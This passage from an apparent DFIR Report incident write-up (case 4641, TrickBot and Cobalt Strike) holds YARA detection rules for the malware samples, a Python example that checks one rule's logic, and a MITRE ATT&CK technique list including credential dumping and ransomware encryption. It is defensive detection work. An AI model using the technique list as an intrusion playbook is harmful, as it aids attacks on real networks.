$s19 = "max rootpage (%d) disagrees with header (%d)" fullword ascii
$s20 = "-- Query %d --------------------------------" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 4000KB and
( pe.imphash() == "67f1f64a3db0d22bf48121a6cea1da22" or 8 of them )
}
rule sig_4641_62 {
meta:
description = "4641 - file 62.dll"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-08-02"
hash1 = "8b9d605b826258e07e63687d1cefb078008e1a9c48c34bc131d7781b142c84ab"
strings:
$s1 = "Common causes completion include incomplete download and damaged media" fullword ascii
$s2 = "An error occurred writing to the file" fullword ascii
$s3 = "asks should be performed?" fullword ascii
$s4 = "The waiting time for the end of the launch was exceeded for an unknown reason" fullword ascii
$s5 = "Select the Start Menu folder in which you would like Setup to create the programs shortcuts, then click Next. Which additional t" ascii
$s6 = "HcA<E3" fullword ascii /* Goodware String - occured 1 times */
$s7 = "Select the Start Menu folder in which you would like Setup to create the programs shortcuts, then click Next. Which additional t" ascii
$s8 = "D$([email protected]" fullword ascii /* Goodware String - occured 1 times */
$s9 = "Please verify that the correct path and file name are given" fullword ascii
$s10 = "Critical error" fullword ascii
$s11 = "Please read this information carefully" fullword ascii
$s12 = "Unknown error occurred for time: " fullword ascii
$s13 = "E 3y4i" fullword ascii
$s14 = "D$tOuo2" fullword ascii
$s15 = "D$PH9D$8tXH" fullword ascii
$s16 = "E$hik7" fullword ascii
$s17 = "D$p]mjk" fullword ascii
$s18 = "B):0~\"Z" fullword ascii
$s19 = "Richo/" fullword ascii
$s20 = "D$xJij" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 70KB and
( pe.imphash() == "42205b145650671fa4469a6321ccf8bf" and pe.exports("StartW") or 8 of them )
}
rule sig_4641_tdrE934 {
meta:
description = "4641 - file tdrE934.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-08-02"
hash1 = "48f2e2a428ec58147a4ad7cc0f06b3cf7d2587ccd47bad2ea1382a8b9c20731c"
strings:
$s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s2 = "D:\\1W7w3cZ63gF\\wFIFSV\\YFU1GTi1\\i5G3cr\\Wb2f\\Cvezk3Oz\\2Zi9ir\\S76RW\\RE5kLijcf.pdb" fullword ascii
$s3 = "https://sectigo.com/CPS0" fullword ascii
$s4 = "2http://crl.comodoca.com/AAACertificateServices.crl04" fullword ascii
$s5 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii
$s6 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
$s7 = "ntdll.dlH" fullword ascii
$s8 = "http://ocsp.sectigo.com0" fullword ascii
$s9 = "2http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s" fullword ascii
$s10 = "2http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#" fullword ascii
$s11 = "tmnEt6XElyFyz2dg5EP4TMpAvGdGtork5EZcpw3eBwJQFABWlUZa5slcF6hqfGb2HgPed49gr2baBCLwRel8zM5cbMfsrOdS1yd6bMpepebebyT4NIN6zOvk" fullword ascii
$s12 = "[email protected]" fullword ascii
$s13 = "operator co_await" fullword ascii
$s14 = "ZGetModuleHandle" fullword ascii
$s15 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
$s16 = "RtlExitUserThrea`NtFlushInstruct" fullword ascii
$s17 = "UAWAVAUATVWSH" fullword ascii
$s18 = "AWAVAUATVWUSH" fullword ascii
$s19 = "AWAVVWSH" fullword ascii
$s20 = "UAWAVATVWSH" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and
( pe.imphash() == "4f1ec786c25f2d49502ba19119ebfef6" or 8 of them )
}
rule sig_4641_netscan {
    meta:
        description = "4641 - file netscan.exe"
        author = "The DFIR Report"
        reference = "https://thedfirreport.com"
        date = "2021-08-02"
        hash1 = "bb574434925e26514b0daf56b45163e4c32b5fc52a1484854b315f40fd8ff8d2"
    strings:
        $s1 = "netscan.exe" fullword ascii
        $s2 = "TFMREMOTEPOWERSHELL" fullword wide
        $s3 = "TFMREMOTEPOWERSHELLEDIT" fullword wide
        $s4 = "TFMBASEDIALOGREMOTEEDIT" fullword wide
        $s5 = "*http://crl4.digicert.com/assured-cs-g1.crl0L" fullword ascii
        $s6 = "*http://crl3.digicert.com/assured-cs-g1.crl00" fullword ascii
        $s7 = "TFMIGNOREADDRESS" fullword wide
        $s8 = "TREMOTECOMMONFORM" fullword wide
        $s9 = "TFMSTOPSCANDIALOG" fullword wide
        $s10 = "TFMBASEDIALOGSHUTDOWN" fullword wide
        $s11 = "TFMBASEDIALOG" fullword wide
        $s12 = "TFMOFFLINEDIALOG" fullword wide
        $s13 = "TFMLIVEDISPLAYLOG" fullword wide
        $s14 = "TFMHOSTPROPS" fullword wide
        $s15 = "GGG`BBB" fullword ascii /* reversed goodware string 'BBB`GGG' */
        $s16 = "SoftPerfect Network Scanner" fullword wide
        $s17 = "TUSERPROMPTFORM" fullword wide
        $s18 = "TFMREMOTESSH" fullword wide
        $s19 = "TFMREMOTEGROUPSEDIT" fullword wide
        $s20 = "TFMREMOTEWMI" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 6000KB and
        ( pe.imphash() == "573e7039b3baff95751bded76795369e" and ( pe.exports("__dbk_fcall_wrapper") and pe.exports("dbkFCallWrapperAddr") ) or 8 of them )
}

rule sig_4641_tdr615 {
    meta:
        description = "4641 - file tdr615.exe"
        author = "The DFIR Report"
        reference = "https://thedfirreport.com"
        date = "2021-08-02"
        hash1 = "12761d7a186ff14dc55dd4f59c4e3582423928f74d8741e7ec9f761f44f369e5"
    strings:
        $s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
        $s2 = "I:\\RoDcnyLYN\\k1GP\\ap0pivKfOF\\odudwtm30XMz\\UnWdqN\\01\\7aXg1kTkp.pdb" fullword ascii
        $s3 = "https://sectigo.com/CPS0" fullword ascii
        $s4 = "2http://crl.comodoca.com/AAACertificateServices.crl04" fullword ascii
        $s5 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii
        $s6 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
        $s7 = "http://ocsp.sectigo.com0" fullword ascii
        $s8 = "2http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s" fullword ascii
        $s9 = "2http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#" fullword ascii
        $s10 = "[email protected]" fullword ascii
        $s11 = "operator co_await" fullword ascii
        $s12 = "GetModuleHandleRNtUnmapViewOfSe" fullword ascii
        $s13 = "+GetProcAddress" fullword ascii
        $s14 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
        $s15 = "RtlExitUserThrebNtFlushInstruct" fullword ascii
        $s16 = "Sectigo Limited1$0\"" fullword ascii
        $s17 = "b<log10" fullword ascii
        $s18 = "D*<W -" fullword ascii
        $s19 = "WINDOWSPROJECT1" fullword wide
        $s20 = "WindowsProject1" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 10000KB and
        ( pe.imphash() == "555560b7871e0ba802f2f6fbf05d9bfa" or 8 of them )
}

rule CS_DLL {
    meta:
        description = "62.dll"
        author = "The DFIR Report"
        reference = "https://thedfirreport.com"
        date = "2021-07-07"
        hash1 = "8b9d605b826258e07e63687d1cefb078008e1a9c48c34bc131d7781b142c84ab"
    strings:
        $s1 = "Common causes completion include incomplete download and damaged media" fullword ascii
        $s2 = "StartW" fullword ascii
        $s4 = ".rdata$zzzdbg" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 70KB and ( pe.imphash() == "42205b145650671fa4469a6321ccf8bf" )
        or ( all of them )
}

rule tdr615_exe {
    meta:
        description = "Cobalt Strike on beachhead: tdr615.exe"
        author = "The DFIR Report"
        reference = "https://thedfirreport.com"
        date = "2021-07-07"
        hash1 = "12761d7a186ff14dc55dd4f59c4e3582423928f74d8741e7ec9f761f44f369e5"
    strings:
        $a1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
        $a2 = "I:\\RoDcnyLYN\\k1GP\\ap0pivKfOF\\odudwtm30XMz\\UnWdqN\\01\\7aXg1kTkp.pdb" fullword ascii
        $b1 = "[email protected]" fullword ascii
        $b2 = "operator co_await" fullword ascii
        $b3 = "GetModuleHandleRNtUnmapViewOfSe" fullword ascii
        $b4 = "RtlExitUserThrebNtFlushInstruct" fullword ascii
        $c1 = "Jersey City1" fullword ascii
        $c2 = "Mariborska cesta 971" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 10000KB and
        any of ($a*) and 2 of ($b*) and any of ($c*)
}
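The conditions above lean on three YARA building blocks: the `uint16(0) == 0x5a4d` header test, `N of them` counts over `fullword` strings, and `pe.imphash()` from the pe module (so the rule file must begin with `import "pe"`). The following Python is an added example, not part of The DFIR Report's rule set: it reimplements those three pieces so a responder can see exactly what a hit on CS_DLL means. One caveat it makes visible: YARA's `and` binds tighter than `or`, so in CS_DLL the MZ/size/imphash clause and the `all of them` clause are alternatives, and any file carrying the three strings matches even if it is not a PE. The sample bytes and import tables are constructed for illustration (they are not from the case samples), and the imphash routine follows pefile's algorithm but omits its ws2_32/oleaut32 ordinal-to-name lookup table.

```python
"""Added example: evaluate the shape of the case-4641 YARA conditions in pure
Python. Constructed inputs only; not The DFIR Report's code."""
import hashlib
import re

# The three strings of rule CS_DLL, copied from the rule above.
CS_DLL_STRINGS = [
    b"Common causes completion include incomplete download and damaged media",
    b"StartW",
    b".rdata$zzzdbg",
]
CS_DLL_IMPHASH = "42205b145650671fa4469a6321ccf8bf"  # from the rule's condition


def is_mz(data: bytes) -> bool:
    """YARA's uint16(0) is a little-endian 16-bit read; 0x5a4d is b'MZ'."""
    return len(data) >= 2 and int.from_bytes(data[:2], "little") == 0x5A4D


def fullword_hits(data: bytes, patterns) -> int:
    """Number of patterns present at least once as a YARA 'fullword' match:
    the occurrence may not be immediately preceded or followed by an
    alphanumeric byte ('StartW' inside 'StartWindow' does not count)."""
    hits = 0
    for pat in patterns:
        rx = re.compile(rb"(?<![0-9A-Za-z])" + re.escape(pat) + rb"(?![0-9A-Za-z])")
        if rx.search(data):
            hits += 1
    return hits


def imphash(imports) -> str:
    """pefile-style import hash over (dll, function-or-ordinal) pairs in
    import-table order: lowercase both parts, strip a .dll/.ocx/.sys suffix,
    render ordinals as 'ordN', join 'dll.func' with commas, MD5 the result.
    Simplification (assumption): pefile also maps well-known ordinals
    (ws2_32, oleaut32) back to names; that lookup table is omitted here."""
    parts = []
    for dll, func in imports:
        lib = dll.lower()
        base, _, ext = lib.rpartition(".")
        if ext in ("dll", "ocx", "sys"):
            lib = base
        name = f"ord{func}" if isinstance(func, int) else func.lower()
        parts.append(f"{lib}.{name}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def cs_dll_matches(data: bytes, imports) -> bool:
    """Rule CS_DLL's condition with YARA precedence made explicit:
    (MZ and filesize < 70KB and imphash == X) or (all of them)."""
    pe_clause = (
        is_mz(data)
        and len(data) < 70 * 1024
        and imphash(imports) == CS_DLL_IMPHASH
    )
    string_clause = fullword_hits(data, CS_DLL_STRINGS) == len(CS_DLL_STRINGS)
    return pe_clause or string_clause


def sample_text_blob() -> bytes:
    """Constructed: a plain text file (no MZ header) that quotes all three strings."""
    return b"notes:\n" + b"\n".join(CS_DLL_STRINGS) + b"\n"


def sample_fake_pe() -> bytes:
    """Constructed: MZ header, well under 70KB, containing 'StartWindow'
    (which must not satisfy the fullword string 'StartW') and nothing else."""
    return b"MZ" + b"\x00" * 62 + b"StartWindow\x00" + b"\x00" * 1024


if __name__ == "__main__":
    print("text blob matches CS_DLL:", cs_dll_matches(sample_text_blob(), []))
    print("fake PE matches CS_DLL:  ",
          cs_dll_matches(sample_fake_pe(), [("KERNEL32.DLL", "GetProcAddress")]))
```

The text blob matches and the fake PE does not, which is the point to keep in mind when triaging hits from this rule set: a CS_DLL alert on a non-PE file is the `all of them` branch firing on strings alone, while a hit on a real PE should be confirmed by recomputing the imphash with pefile or `yara -s` before treating it as the 62.dll sample.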
MITRE
Phishing: Spearphishing Attachment – T1566.001
Signed Binary Proxy Execution: Regsvr32 – T1218.010
Impair Defenses: Disable or Modify Tools – T1562.001
Domain Trust Discovery – T1482
OS Credential Dumping: LSASS Memory – T1003.001
System Owner/User Discovery – T1033
Command and Scripting Interpreter: PowerShell – T1059.001
Data Staged: Local Data Staging – T1074.001
System Information Discovery – T1082
Account Discovery: Local Account – T1087.001
Account Discovery: Domain Account – T1087.002
OS Credential Dumping: NTDS – T1003.003
Windows Management Instrumentation – T1047
Browser Bookmark Discovery – T1217
Data Encrypted for Impact – T1486
Remote Services: SMB/Windows Admin Shares – T1021.002
MITRE Software
AdFind – S0552
BloodHound – S0521
Cobalt Strike – S0154
Systeminfo – S0096
Net – S0039
Nltest – S0359
Esentutl – S0404
PsExec – S0029
Cmd – S0106
References
TrickBot Malware Alert (AA21-076A), US CERT – https://us-cert.cisa.gov/ncas/alerts/aa21-076a
Advisory: Trickbot, NCSC – https://www.ncsc.gov.uk/news/trickbot-advisory
Trickbot Still Alive and Well, The DFIR Report – https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/
Hunting for GetSystem in offensive security tools, RedCanary – https://redcanary.com/blog/getsystem-offsec/
TrickBot Banking Trojan, ThreatPost – https://threatpost.com/trickbot-banking-trojan-module/167521/
Internal case #4641